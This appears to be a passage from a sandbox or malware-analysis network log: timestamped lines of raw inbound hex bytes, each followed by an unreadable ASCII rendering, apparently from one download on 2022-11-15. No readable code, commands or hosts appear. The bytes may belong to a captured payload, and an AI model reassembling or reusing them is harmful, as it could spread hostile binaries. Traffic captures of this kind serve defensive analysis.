                                                                                                                                                  2022-11-15 17:54:38 UTC4991INData Raw: 89 43 fc 97 d7 37 87 26 3b 81 40 15 2f 7a e6 17 5f b4 f4 b2 13 46 d8 74 53 19 01 62 f2 c9 47 32 7e 8a f3 03 68 a8 4a 9d 28 58 89 b4 0b 43 0b 05 54 a7 c9 5d 73 f2 c9 5c 9e 40 0a 43 5f 7f 98 23 0b fa bc a0 80 81 51 3d c3 a7 f0 01 cb fd da 84 08 59 bb e9 87 a1 5b 51 3f f2 c0 f5 af 69 cf 2a a7 e5 93 39 a9 6e 8d 30 60 17 4a 1d c9 ef 7f 04 c1 e2 07 c0 39 3b 37 b9 c0 ea f2 bf db 9d 77 2d 01 d7 c6 9a b7 f6 af d0 67 a4 5a c1 d8 d7 73 40 e1 5a 31 ba 02 15 b1 dd 07 d1 2c 9c 2a 60 8d 61 09 b9 3e 4c 15 fa 66 13 09 ca d4 a2 a7 c4 79 e4 1e 65 cc 33 20 03 ef 5c a1 d1 c0 87 24 36 3c b7 07 49 f8 aa c1 4a 0b 48 e6 5d 6e 38 cc 03 03 d7 b6 36 38 b7 e0 b9 ae 8d 54 ee 14 9f 2e de d5 5c bc 4f 2c b9 a6 42 d2 80 08 78 77 f1 3f e1 40 09 69 79 01 22 fb 04 19 e9 b2 3d e6 95 6e 20 3c
                                                                                                                                                  Data Ascii: C7&;@/z_FtSbG2~hJ(XCT]s\@C_#Q=Y[Q?i*9n0`J9;7w-gZs@Z1,*`a>Lfye3 \$6<IJH]n868T.\O,Bxw?@iy"=n <
                                                                                                                                                  2022-11-15 17:54:38 UTC5007INData Raw: ea 79 c6 1b 95 de 88 c0 2d 25 36 22 02 c7 cd d8 69 98 d4 ff ee db 20 94 3e 25 99 6c fd 9e d8 97 76 66 58 10 d0 c6 20 16 19 30 7d 7e 80 dd b5 00 e9 e5 a4 7c 8f 01 ea b2 5a fc ea 41 48 df 4a 58 7f 00 ed 16 e2 fd 08 19 00 55 99 08 74 5d da d8 76 ea a7 9d 42 0d f6 6c ea 6c 44 cc dd d8 7f df d4 10 ce ab 00 e5 ba 9f 3b 28 9c cf 52 ac fe a3 af 12 5b 28 e8 6a 1c 2f f5 40 ee 8d 05 ac 1e 06 ab 77 85 5d 75 dc 9d 84 7f b2 fb f4 1c 08 4e 12 bf 38 ec 7f fc 01 b7 9c de 97 f6 b4 70 f2 5f c0 34 81 6f b3 ff e3 4b dd ac 94 b0 06 d2 01 bf c7 90 0e 2c de 1c 27 c2 7f 77 59 f8 58 f0 dd e1 2e a8 2a b1 a4 12 c2 3a 4c 08 20 96 d4 20 ea d0 55 e8 5a 0a be 85 b0 aa af 9b 5d c9 ae d5 89 8c 5f 3e 32 20 1b fd 7d 36 9f fb 49 80 c2 6b a6 23 11 90 09 68 66 41 53 e0 7b d4 95 59 f1 10 05 ce
                                                                                                                                                  Data Ascii: y-%6"i >%lvfX 0}~|ZAHJXUt]vBllD;(R[(j/@w]uN8p_4oK,'wYX.*:L UZ]_>2 }6Ik#hfAS{Y
                                                                                                                                                  2022-11-15 17:54:38 UTC5023INData Raw: 2d 79 ac 2a a1 76 6e 37 2d 83 2c 8b c9 6b e4 3e ea 64 3c a4 3e dc 60 d4 1c 18 15 2d b5 4a 79 d8 d5 70 70 02 e1 00 06 8d 08 0b 98 79 18 0d 44 ac f1 e4 ae 62 a2 09 d5 99 2f 91 2a 04 7f 23 63 95 24 fc 19 80 50 f9 3e f5 01 9d 7e 34 89 dc 5a 75 fb f2 02 02 a4 b2 32 cc 38 31 ce da 28 d8 80 7f dc be 14 2f d4 01 df 98 32 b5 5a 32 f6 d9 2c cf 5f de f2 83 ab 42 60 5b 5a 4c f9 04 c4 36 3b ae f8 96 a0 fd c1 45 00 42 9b 2f 55 13 1a d5 10 5a c0 a9 64 f1 0c 65 3e 32 d9 7e 55 47 54 25 22 da 57 10 7d ee d4 38 f7 69 47 00 73 5c 87 7f 2d 05 8d c0 21 c4 e6 33 48 c3 14 67 e4 4f 3c 84 b9 5c f8 0f b2 92 fe b7 03 48 01 05 ed 18 fc fe 26 14 ba 69 4b 1e fc b7 8b 56 75 91 a4 5e 6a 68 36 68 16 f2 51 13 a5 17 85 38 5b 59 74 eb 8f bc 4e f8 46 bd 7e c8 ad 1e 39 38 39 da 94 48 ab e9 1d
                                                                                                                                                  Data Ascii: -y*vn7-,k>d<>`-JyppyDb/*#c$P>~4Zu281(/2Z2,_B`[ZL6;EB/UZde>2~UGT%"W}8iGs\-!3HgO<\H&iKVu^jh6hQ8[YtNF~989H
                                                                                                                                                  2022-11-15 17:54:38 UTC5039INData Raw: 4e ff 04 c6 e4 f8 86 01 ec 86 a5 cb 3d 0c bd 99 03 f5 60 41 fe 7a e3 44 27 50 85 53 e5 94 69 ef b2 7e 04 a0 c7 f1 c5 aa a2 77 84 b7 0c aa e8 9e a2 f4 d4 5e 1c 68 68 a0 16 f7 ba 02 2b dd 19 7e 07 50 d7 7d e8 a8 5c 62 59 c4 04 85 9f 1e 0c 46 02 78 8d 46 61 a1 7b 73 88 3c 29 60 50 a9 f2 c9 38 a4 60 7d c9 b3 c0 10 6e 66 d5 4f 53 4b 5d 81 30 d3 29 7c 1c 06 33 71 1e 42 54 78 58 30 15 36 18 20 32 6d 60 0b 30 03 ed 7b fe 80 8b 26 2f 12 1d f9 8a 69 c6 f5 5e bc f0 ea c3 2e 2c 01 09 ef c0 cd b7 f0 36 e5 cb 24 a5 f7 e6 41 27 7d 63 f7 14 6c f1 4a 8f 84 c1 01 ed b1 bc 83 70 a8 bd 5e d9 d6 20 88 78 74 d9 a7 1e c2 c9 3b 55 db b4 c9 46 e2 3a 2a 89 ca 99 45 26 47 10 31 2d 1a 82 83 58 7d f9 4b 1c b3 3d 7b 4a fc ef 31 6a 5e bc 40 c5 c8 d3 22 50 ad b9 f0 1a 71 0d e2 18 77 45
                                                                                                                                                  Data Ascii: N=`AzD'PSi~w^hh+~P}\bYFxFa{s<)`P8`}nfOSK]0)|3qBTxX06 2m`0{&/i^.,6$A'}clJp^ xt;UF:*E&G1-X}K={J1j^@"PqwE
                                                                                                                                                  2022-11-15 17:54:38 UTC5055INData Raw: 39 fc 2c 3f b6 d5 92 be 64 a9 fa f6 74 d3 bb 3c 77 e9 1f 94 21 c0 ef d6 f1 40 2d 0f 79 4d 89 56 3e 69 f0 3f a8 b6 c1 ba ee 3b 75 69 2e d6 9f e7 28 56 d7 09 2d 1e ff 7f 1c 29 f5 4e 6e 2a e9 24 9d d9 d6 a5 3d d3 ad 7a e5 97 fd 1f 62 2f d5 1d 71 ad 54 ef 52 d6 9a dc 20 bc d8 97 66 02 20 63 9e 34 8e 80 08 a3 22 4e a0 bb 53 c6 52 9a 77 10 4a 4c c1 9a 43 05 7b 8a 44 9d ef d3 b0 8c 25 bb 40 52 77 1f f0 5c e3 6e bc a2 a1 86 04 01 6f 8b 6e 70 be 60 fa 7a 02 8c fc 50 46 94 3a df 44 d7 5f cc 16 f6 01 1e d1 8d 4e fb 3e 5c c6 12 80 fe 3c 9e 18 5f 56 ac 4b f3 a2 d1 be b1 00 27 3e 68 76 4f 2f 83 db 60 3e 32 1b 02 ad 48 cb 36 67 46 5e 6e 54 cb d5 1d 53 f2 50 5d 9c 80 21 4c a7 1e c2 47 aa f7 37 80 88 c0 4a 08 cf 9e 50 b6 bc ac 98 00 0e e1 ac 59 23 7f ce bd 2a d9 a9 c2 24
                                                                                                                                                  Data Ascii: 9,?dt<w!@-yMV>i?;ui.(V-)Nn*$=zb/qTR f c4"NSRwJLC{D%@Rw\nonp`zPF:D_N>\<_VK'>hvO/`>2H6gF^nTSP]!LG7JPY#*$
                                                                                                                                                  2022-11-15 17:54:38 UTC5071INData Raw: 28 03 80 3b b4 33 8a 32 09 37 18 74 98 84 89 1a ca 58 47 84 63 9e fc 0e e8 21 4a 6b 06 11 de 98 05 ab 62 53 f9 84 fc c3 84 75 45 ad c1 13 dc 5d ae ca ba 8b f6 a3 ba 39 8a 4c 08 34 18 22 bb 64 d5 49 1e d7 ce 20 a7 6f ae 8a e6 8e f2 2d 59 b4 62 e2 21 14 84 8c 25 ad d1 f1 fd 02 5e 37 e4 33 30 26 81 e1 c2 27 56 d6 dd 23 5a 0b a0 9c 57 74 c4 50 09 de bf 30 79 03 33 12 e6 eb 60 d6 18 3a 42 7d f1 b7 fe 01 f0 f2 1e c0 5c 7b 56 ba cd 74 50 07 1a 6d f4 f7 0b 4f ce 5b 0e e1 f9 8a 3f 82 94 1d 46 50 13 03 27 9e 13 e9 8a 08 5e fc 50 c6 6b 43 24 32 09 d6 c8 41 7f 92 1e 77 e6 3b 20 65 89 31 fd 9f 30 ba bc 3e 75 ca ab 8f d8 2a 76 f0 27 d9 9b 7e 7d e2 b1 45 5d ee 1d 9d 56 7e 70 96 ed bf 15 69 a4 33 44 ca ba 6a 4b 2d e0 d2 c8 4b 87 f8 c1 ad 3b df 20 10 6b 04 12 ae c7 bb 70
                                                                                                                                                  Data Ascii: (;327tXGc!JkbSuE]9L4"dI o-Yb!%^730&'V#ZWtP0y3`:B}\{VtPmO[?FP'^PkC$2Aw; e10>u*v'~}E]V~pi3DjK-K; kp
                                                                                                                                                  2022-11-15 17:54:38 UTC5087INData Raw: e9 2f 13 52 2a ae 21 15 89 c2 b9 98 ac 72 99 07 73 01 ea 8e 54 08 1a 51 68 3b c3 69 f8 d1 03 39 54 e9 0a 5a ee 53 b5 db e3 02 e5 60 6a 76 32 55 95 ee 24 08 ad 57 3a 67 59 52 84 29 de 5b b9 42 9e 25 48 29 db 9f e0 60 9d 9c 99 5e 29 44 76 19 57 05 c5 79 b4 32 4f e0 a0 b7 70 36 00 9a f4 c6 74 de 5f 29 7d b7 c5 c3 84 68 eb ff 3d 2e 3c 6c f2 4b 71 f3 a3 c7 15 f6 e9 f7 45 e3 a1 28 c1 88 9e ff 0d 7b a3 0a cb 88 78 a2 94 de 63 f2 f8 14 ec d5 e1 86 25 a2 7f 3a a3 d7 99 ed 7e 55 9f be 2d 63 60 90 45 40 a9 e4 5e f4 a7 49 0b 52 44 fd d9 3e 41 55 22 fa 2c 7e a1 0e e7 83 30 7a d0 45 c0 06 18 c7 b8 ab 08 ac 0c c4 e0 b3 b6 18 b0 00 43 c8 45 13 fa 28 09 25 17 21 85 f0 f9 f0 08 de 4c 49 82 79 b4 a2 44 ff 88 ec 11 04 ba b5 0c 40 95 53 5f af ee 43 fb 00 ea 91 04 80 38 5e 75
                                                                                                                                                  Data Ascii: /R*!rsTQh;i9TZS`jv2U$W:gYR)[B%H)`^)DvWy2Op6t_)}h=.<lKqE({xc%:~U-c`E@^IRD>AU",~0zECE(%!LIyD@S_C8^u
                                                                                                                                                  2022-11-15 17:54:38 UTC5103INData Raw: 68 3e ae 7d 09 70 89 14 7d f3 16 44 55 be f8 40 bd 81 67 68 9c 19 ac 5f 42 2e e2 7d 5e 1f 56 4a 58 ea 40 42 57 51 b9 df 87 27 54 25 fc d2 65 2c 00 58 58 68 98 0c 8d 4b 6b eb de b0 5a ef 66 55 2b 5b 5a ed 4e e4 ea ac 04 a8 e9 59 d4 85 75 26 5c 49 4e ce f3 c9 4c 3a f8 02 8b 0a f8 20 32 9f 5b 28 95 6a c2 40 26 ac 37 82 d5 18 5c d2 72 27 1a 83 a5 c2 f2 bb 67 0e b1 8d 94 53 7d d2 04 82 68 ea c4 ac 3a b1 3a eb c2 38 a8 87 00 9b a0 8a 33 6e f7 22 b8 2c 60 e1 3e 70 7a f1 4d 01 6c d6 af c2 9e d3 16 0c b8 98 fe 04 34 91 05 8f 99 8c de 39 04 14 18 5f e4 c6 9e 40 8d 8f 00 95 4f 91 a8 a3 4c 70 54 60 9d 24 ca 52 f7 87 98 00 25 a1 53 d2 d8 5f c2 f0 fe 2f 97 40 d8 a2 ec 2f 95 ea 5a ec 65 97 0d 11 00 c2 46 b6 81 44 7c 97 c6 8c 31 09 77 44 2c 25 c2 5f 30 78 55 83 02 f0 4f
                                                                                                                                                  Data Ascii: h>}p}DU@gh_B.}^VJX@BWQ'T%e,XXhKkZfU+[ZNYu&\INL: 2[(j@&7\r'gS}h::83n",`>pzMl49_@OLpT`$R%S_/@/ZeFD|1wD,%_0xUO
                                                                                                                                                  2022-11-15 17:54:38 UTC5119INData Raw: c8 97 fe 60 f4 20 44 e1 cb 1d 01 be 6f 7b 38 63 d6 79 2b e8 c6 f1 fe 66 8b d0 26 3f f6 96 50 24 d4 41 c9 e3 e4 be 3b d4 58 55 4f 21 d2 11 d3 fa df a0 cc d4 3c 42 7b 2c 8b 4f 89 54 2f f5 55 fb 12 78 78 5d 80 df f4 85 25 d9 f8 16 3c b7 92 96 97 54 10 68 57 8f 7a bc 46 52 f5 17 f2 82 68 88 12 d3 57 58 13 3b ba fe 13 e4 73 fa 8f 49 4a 4f 64 c3 e4 35 48 b3 07 60 1b 0a 9b ce 30 97 45 f2 cb 57 ef 84 a5 d5 bc 1b d2 9f ea 8b 20 80 53 bb 79 5b 9d 7c 7e 0c eb 5d 60 b7 0c e3 00 f3 ab db 4d 52 ba 46 37 ca 2a 31 90 06 c1 eb 03 a6 09 7a ac 70 f9 58 f5 95 de 11 7b 4f 74 38 1f f5 5e 5e 2c bb e9 03 60 9a bf ff d3 aa b8 a3 d1 c0 00 50 43 05 e6 d7 1b 1d 96 0b 90 12 a5 7e fc 21 e1 c3 25 02 10 37 5c 69 24 c8 09 4a 54 27 4d 79 7f 4d af c1 b2 e7 ff 6e ed 4c f1 b7 58 01 d9 33 2e
                                                                                                                                                  Data Ascii: ` Do{8cy+f&?P$A;XUO!<B{,OT/Uxx]%<ThWzFRhWX;sIJOd5H`0EW Sy[|~]`MRF7*1zpX{Ot8^^,`PC~!%7\i$JT'MyMnLX3.
                                                                                                                                                  2022-11-15 17:54:38 UTC5135INData Raw: da be 24 0f 7f 45 80 13 32 57 66 ef 99 42 08 48 98 40 01 fc 5e 82 ad b4 b3 8c fc 49 9b fe f4 eb df c0 92 c0 98 30 ac a9 20 41 2f e2 58 b6 49 26 40 54 21 28 88 43 0c 09 60 0e 5e 2c 46 15 51 5a eb f9 84 b3 76 4b d6 fc f5 08 e1 b6 b2 03 e3 1d 66 cf d4 59 1e 0f 3f 31 43 5f 62 41 0f 91 66 89 64 07 8f 5d 96 b7 e1 25 c2 00 b7 b6 b7 10 04 b2 1b 89 15 1d 80 fc 60 93 01 89 62 80 0d 8c 6d 20 40 9a ca 00 80 77 d2 07 56 0f 3c 81 09 83 f1 aa a2 f5 96 94 48 b0 2e 4f aa 9d 0f 87 5c 34 4c fd f3 a2 b8 0b 3c 46 48 54 7f b1 7f 55 6f b6 33 d6 b5 55 fc a7 2f 2e 03 11 c3 bc 09 a1 92 77 f7 b3 e7 d8 98 c8 0f 9f a9 78 f5 15 42 bb 4e ba 63 79 14 fa c7 00 6a 52 3b 59 f4 2c 95 f4 66 d9 55 3e fc da a9 2f ab 2b 1d d3 fb 6e 1f 5e e6 8d 4b b3 5d 5f fb 74 cd eb cb f7 50 68 bf 4e ff e2 8e
                                                                                                                                                  Data Ascii: $E2WfBH@^I0 A/XI&@T!(C`^,FQZvKfY?1C_bAfd]%`bm @wV<H.O\4L<FHTUo3U/.wxBNcyjR;Y,fU>/+n^K]_tPhN
                                                                                                                                                  2022-11-15 17:54:38 UTC5151INData Raw: 02 00 59 f1 2d 40 f8 9f b2 3b 95 ed 4b 82 f9 d2 be ff 55 74 a8 ed a0 3e a8 e7 b9 28 b4 43 da a4 b2 69 04 77 2a 02 49 49 5b 01 9b 1f b7 40 3f 8b 72 89 9f c4 15 d3 0b bc 07 03 1b 27 f5 7b 81 98 f6 eb 2b bd 5c ff 39 bd f3 f9 02 ed cc de 7c 32 23 cd 67 0b e9 63 f9 c5 49 97 b8 97 57 a2 79 b6 59 97 67 17 69 74 d4 52 d5 53 1e e5 13 94 fd ea 72 52 54 77 cc af 09 86 fc ec 1b 79 03 6b d2 58 95 7d 9d ca a7 65 6c a7 76 a0 d4 45 0d d5 5b 68 e7 0b bf ee 7d 38 14 df a8 44 ff e8 13 09 d4 34 a6 7b 20 44 38 19 33 4a f6 19 0e 98 13 a2 05 4a 1c 0b 1a a0 98 0e 95 19 81 9d c6 42 c8 56 58 85 cc bd 57 bf 45 f5 54 32 ab 80 e9 35 0f cf 60 a8 18 29 62 9e 10 74 2e 1f ac 38 6b c2 83 df ce 26 df 3e 57 4b d5 fc 5b 4e a7 33 c9 93 d0 58 9d 5d 84 99 67 2c 3a 25 7a b1 8b c5 d6 21 11 38 04
                                                                                                                                                  Data Ascii: Y-@;KUt>(Ciw*II[@?r'{+\9|2#gcIWyYgitRSrRTwykX}elvE[h}8D4{ D83JJBVXWET25`)bt.8k&>WK[N3X]g,:%z!8
                                                                                                                                                  2022-11-15 17:54:38 UTC5167INData Raw: c5 56 93 40 52 05 09 68 20 14 76 ee 99 75 ff 4b 45 fb 79 a6 34 83 48 18 c3 ae 45 11 55 bd 7d 18 25 76 23 f9 a7 4b fd 45 d8 69 d5 14 3a d2 74 fb b2 5a b5 aa a2 90 b5 e1 d0 2a ba 3f 0a 59 1e 4e eb 2a f2 4e ee 78 9c a6 07 19 bf ff 3a 06 69 5d 79 b9 81 ab 77 e4 d1 2f 6e e0 89 b9 05 96 67 8e ae 0e 20 14 d8 77 ff 16 d1 37 26 ad db 00 b5 a6 a7 86 9f bc 0b 40 f7 72 03 7a 07 2c 1d d9 0d 00 15 52 38 36 51 af e5 bd 39 96 49 b1 3f 1a 0f 37 20 34 17 0b 81 b8 41 27 e3 c3 31 60 c4 1a 84 28 c8 44 fe 19 88 aa c2 1c 47 e1 f3 86 1e bd ca 0d 0a 30 96 30 52 41 d2 a5 73 32 4b fe a6 a5 20 74 09 f9 90 35 cf 5f 51 e7 3b a7 fb 5f b4 65 13 73 6a fe ba f2 08 c6 d5 0e 1c 02 da 79 05 71 3f 7b 5e d7 54 4a fb b6 41 f2 b7 55 89 c7 5d fb 5f 50 53 43 5e ff ef 6b c9 13 41 43 bf a2 8d a1 cf
                                                                                                                                                  Data Ascii: V@Rh vuKEy4HEU}%v#KEi:tZ*?YN*Nx:i]yw/ng w7&@rz,R86Q9I?7 4A'1`(DG00RAs2K t5_Q;_esjyq?{^TJAU]_PSC^kAC
                                                                                                                                                  2022-11-15 17:54:38 UTC5183INData Raw: c1 61 22 46 3b 80 20 b0 0a e2 24 21 2f 00 86 69 d1 12 f9 c4 17 5a 0b 68 60 df 19 d2 e4 14 9d 66 f5 ea 2d 79 62 c8 75 fe 56 e9 7f 9e f7 80 10 2a d9 4a fe ae 73 17 0a e4 bf e6 e8 76 05 25 e3 2e d6 58 c8 5e b6 25 54 02 54 ae 6f ee 6e 70 ca c7 11 c4 cf 45 df 39 f4 02 31 9f 50 b3 27 8d 60 3a 82 07 96 79 cb 31 0e c0 8e a1 0a 9a 2b fd ff 67 c0 69 57 d2 73 9d 71 19 c9 75 50 aa b1 8e 02 f4 a0 62 38 c8 af bd 6d 29 c6 78 19 24 7a 5a ff 6c f1 90 81 03 f6 88 f3 3d 29 fe 41 2a 08 fe ff b1 14 55 2e b2 c8 80 ba da 7c 76 33 9f ec 57 92 bd bf c7 12 a4 b1 5e bf 65 fe af 56 be 2d de a8 dc bd d6 9e 54 9d 51 1f 4b dc 7f 6d 0a 7a f8 36 a8 e9 90 cf 58 bc 0d 2a 26 e3 01 f7 d5 68 63 fc ac 2e 53 a9 b8 00 ba 76 7f c1 e8 01 0f 8b 69 0e 31 8b 7f 9e 01 d7 b6 fb cb 99 97 b8 32 4f aa 3a
                                                                                                                                                  Data Ascii: a"F; $!/iZh`f-ybuV*Jsv%.X^%TTonpE91P'`:y1+giWsquPb8m)x$zZl=)A*U.|v3W^eV-TQKmz6X*&hc.Svi12O:
                                                                                                                                                  2022-11-15 17:54:38 UTC5199INData Raw: 40 86 e9 f5 fe b8 2d 52 57 4b 75 4e 24 b7 8d 5e a3 6d 75 4d d3 b7 28 0d 15 01 21 ef 58 33 54 a9 70 9e be 49 4d 41 3c 0e 60 06 ec 9c 3f 98 20 08 f6 68 7b 9a 4a e3 80 bb 2f 78 be 16 cc 61 fd ae 8c 0d 9a 58 0b 02 85 ea 55 ae 31 6c b6 2b d6 79 2a 84 ba 64 ff 30 40 b2 06 8c 20 95 e3 26 da 83 84 c0 4a 11 5a 69 01 91 ae 82 d7 7f ee fb 6f 8e c0 18 a0 3a 5f e9 6d 60 02 14 12 f0 0d 2f 2d f8 58 d4 9e 64 2a e0 9e 64 9f 85 b1 7e b2 56 0f ad 2e f4 f6 cc 06 70 ba ba 4f 97 aa 74 4a ef b3 24 84 a0 78 28 15 5e fd 2b dc 4e d1 b4 46 fa 6f b9 86 d0 fa 82 d8 a7 14 d7 80 4a b9 37 20 fc 0a d9 6c cc 6a e1 82 7a 3d b2 2f 57 d6 38 50 cd 67 d2 18 be a6 38 42 d3 1c 4e 39 22 b5 f0 5f 2d d8 b1 c6 6c 3a 33 e0 c4 7d 7d 57 64 d1 23 d2 f0 f4 44 18 68 50 f0 68 b3 6b 28 3b bf 60 08 e1 48 a5
                                                                                                                                                  Data Ascii: @-RWKuN$^muM(!X3TpIMA<`? h{J/xaXU1l+y*d0@ &JZio:_m`/-Xd*d~V.pOtJ$x(^+NFoJ7 ljz=/W8Pg8BN9"_-l:3}}Wd#DhPhk(;`H
                                                                                                                                                  2022-11-15 17:54:38 UTC5215INData Raw: 8b 4a 2d ee 74 c4 bf db f9 8b 5b 75 67 64 cb 6b 6f 04 ed 93 21 d5 6e ae 3e 69 05 15 64 4b 37 a3 c0 92 bc d4 f6 45 16 e9 8d 0b fa ca ba 83 60 c3 02 81 e7 1c 1a 85 c0 d4 e8 de f4 d8 34 46 42 7f 40 0a a2 5a 70 f2 9c c4 65 cf 06 ea e7 5c 80 14 c8 2d 01 b4 bc a3 c9 6c fc ac f7 4e 34 ab 63 96 36 9c 84 56 ef f6 60 00 e6 af 88 f4 77 b9 2b 00 49 78 56 27 cf 5b 5d 4c 00 9d e3 23 6d 92 2a cd ef f4 8d 07 f1 cc fa 4b cb 31 91 7a 3d e8 84 60 01 e9 3a 23 6a f3 ab b2 70 56 85 60 d9 26 af 80 10 b3 00 ef 90 d5 09 4b a0 df fc 00 94 45 aa 89 98 8d 31 a1 00 9a ed ea 95 07 9d 37 3c 00 20 a5 77 1b e5 d7 7c 8b 00 6b 09 61 9f 5a 01 3e 94 3e fe 58 80 fa b6 77 e9 7c e6 0b 00 7d 9c 2b 74 d3 87 1a 44 00 69 af 1c 10 76 9a ba 8d ee e9 00 06 eb a8 c5 01 a7 19 58 03 d6 5c 04 08 88 74 d0
                                                                                                                                                  Data Ascii: J-t[ugdko!n>idK7E`4FB@Zpe\-lN4c6V`w+IxV'[]L#m*K1z=`:#jpV`&KE17< w|kaZ>>Xw|}+tDivX\t
                                                                                                                                                  2022-11-15 17:54:38 UTC5231INData Raw: ec ac 8e 07 5a d0 4d 1a 16 f3 d8 a3 93 7c b0 b6 7a 10 00 32 70 c6 a4 86 91 ac ec 1d c0 e3 3d 40 f7 93 59 1a fb 88 01 31 f1 99 51 58 c4 66 e8 3f 16 01 3d 86 94 48 cc 90 c0 dc 0a 43 00 c9 5b 49 7a f9 5c 46 f0 01 dc 15 7d 8c 19 41 ab f0 bd 6d 0f e2 01 d3 bb 27 ef d1 20 15 4a 31 35 e2 4b 00 60 ea 73 58 ac 3f f3 fe 00 e7 8c 8f 21 47 fc bc d4 00 78 4b b8 ed fa 94 3e 53 00 ce f7 9f 3c c8 ba 88 f1 00 d2 ee e3 aa 44 4d 65 a5 1c 8c 61 c7 40 b3 21 04 4b 42 b1 e2 39 00 af 13 ae cd 0b 3b 2a 6f 5e d7 9f 0e 10 2c 72 4b aa 6a 54 2f dc e0 ae 30 eb ac 1e 00 0d d8 2b cd c1 09 04 b7 00 e5 15 bf 74 38 1c c8 87 00 d5 61 b5 f9 83 49 68 98 00 9e 62 53 d9 fb ea 63 b1 07 b0 ae da 91 c0 20 51 7f 55 1f 00 60 8a ab d2 11 e6 e7 c3 00 c9 30 38 f8 b0 f5 a4 b6 03 82 98 19 2f 83 52 8b ec
                                                                                                                                                  Data Ascii: ZM|z2p=@Y1QXf?=HC[Iz\F}Am' J15K`sX?!GxK>S<DMea@!KB9;*o^,rKjT/0+t8aIhbSc QU`08/R
                                                                                                                                                  2022-11-15 17:54:38 UTC5247INData Raw: 13 c6 00 02 33 94 47 b6 ec 3d 19 1d cb 42 a2 89 f6 09 7f 41 47 c6 25 aa 41 19 14 cb 6d 9e 09 4a 22 7d 01 89 0d 5e 1c 2b fa 4b dd af a4 dd 0f a3 18 58 88 5d 18 07 69 27 f6 cb 89 a0 8d a7 eb 39 6e 02 71 cf 44 f0 12 f8 56 e0 96 1c 80 24 15 56 e3 a0 0b ee a3 81 a1 3b 52 3c 84 e8 bf ec 08 e9 2f 46 e5 51 50 39 3a bd 45 4a c1 cd e9 5d 6f 31 6c 53 55 6b 80 b5 cc ff 7d b8 8d 17 ab 25 6f 4f 96 06 20 c7 fe 3a de 7b fe cf 0c 9a c2 fd 7f 18 ad 0f 12 38 ff 89 36 01 50 cd f6 29 f8 81 48 e5 aa 60 ca 3b f1 f5 60 96 fd df 0c 03 ec bd cf 5b e0 ed 12 1d 98 99 16 89 eb 5d b9 c9 c0 68 53 48 e3 33 cf 11 55 20 ac d0 20 5e 5d 9d bc 49 1c 68 e8 8a d2 16 fe d4 bd ee a8 1a b9 3e a3 70 d6 ad 66 5f ca 7a 98 49 53 68 1d 8f bb bf 65 fe 4e 59 5b 40 be 82 11 ff 5c 3f 59 35 7e 0d 94 42 bf
                                                                                                                                                  Data Ascii: 3G=BAG%AmJ"}^+KX]i'9nqDV$V;R</FQP9:EJ]o1lSUk}%oO :{86P)H`;`[]hSH3U ^]Ih>pf_zISheNY[@\?Y5~B
                                                                                                                                                  2022-11-15 17:54:38 UTC5263INData Raw: 30 4b 3d 48 39 af 44 4f 31 7c 36 2d 5b 7f a4 92 f9 4f 58 3b 54 09 17 cd f7 f5 45 24 80 d5 a0 13 ad ec 7e 00 6a 8b 4a da c9 4f 35 60 00 75 f9 21 0b 70 9e 24 8f 1d 3e 8a bb 94 7f 88 79 00 9a 47 7a 4b d8 a8 75 37 1d 53 ef 4c 40 2c e3 6a 2d 39 93 00 f9 34 14 db 30 c2 1d 9b 00 a4 75 02 5a 50 35 69 91 70 6b ec b1 5b 0c 83 a5 b9 d5 02 90 ef 5b 6d c9 ed ec 6a 0e 55 84 24 da 0b fb c9 54 30 41 55 01 56 be 1a 4f dd 7f 68 c3 27 03 29 20 04 f6 40 b1 22 1e 80 89 f5 6d 64 92 5a 53 cb f2 4f ac af 17 17 2c ee 29 cc 37 f9 0e e8 42 a7 93 ae e7 f2 c9 55 fd 34 ff 97 79 0f 2d 80 1a 6e c1 f7 7b 03 81 f2 54 87 ef 5f 05 0c 05 e4 a7 17 e0 26 35 48 3f 0a 00 6f 0d 11 e8 de 6d 05 09 f3 02 21 82 7f 09 0f 7d b1 43 ee 04 fb 9a 95 4e bb 12 db ae 8e 99 d2 ef 2f b4 5e 39 e1 7a e2 1a a4 ae
                                                                                                                                                  Data Ascii: 0K=H9DO1|6-[OX;TE$~jJO5`u!p$>yGzKu7SL@,j-940uZP5ipk[[mjU$T0AUVOh') @"mdZSO,)7BU4y-n{T_&5H?om!}CN/^9z
                                                                                                                                                  2022-11-15 17:54:38 UTC5279INData Raw: 84 72 7d 43 26 b2 59 e5 54 2f 23 49 76 a1 de 31 11 b7 3c 9f 7a 0a 2a 26 aa 12 9d dc 48 ae 8c 54 67 43 6e 04 72 99 29 81 30 48 79 6a 42 96 5b c8 0d 9e 12 ce 11 7f af 7c 83 83 81 50 6b e8 35 a0 c8 36 79 9b 5a c4 5f e5 b3 40 94 77 b4 25 5b 1f ad 3e d2 27 5e af ef c2 93 bf 8e cc 3f ed 5f af 2a 80 4a eb cb c0 01 95 5f eb 27 f7 d0 80 04 05 6f a0 14 d8 01 25 c2 58 57 c5 85 a5 60 a5 55 bd 03 d4 b7 fb 6f 81 e5 ed ba 0e 78 c1 ce 07 60 ed 06 f7 d5 4d c7 b2 2e 66 71 03 01 e8 6a b3 7f 4a ee 8b 70 89 5b 77 59 39 ce 72 bf 8f e9 4b b2 56 c1 53 f7 19 1c 55 a9 eb 2e 93 09 1a b3 bc 23 18 71 37 12 1e 0b 7a 20 11 6d 38 03 04 80 b4 9b e5 6c ab bc 79 9d 58 41 26 7b 29 90 3a 9f d4 b9 40 fa 8d 82 c2 04 96 b9 3f 8a be d8 35 ec 66 64 5e 9e ea 95 fe 4e 6b 77 a9 da 5d 6f 90 ad d1 af
                                                                                                                                                  Data Ascii: r}C&YT/#Iv1<z*&HTgCnr)0HyjB[|Pk56yZ_@w%[>'^?_*J_'o%XW`Uox`M.fqjJp[wY9rKVSU.#q7z m8lyXA&{):@?5fd^Nkw]o
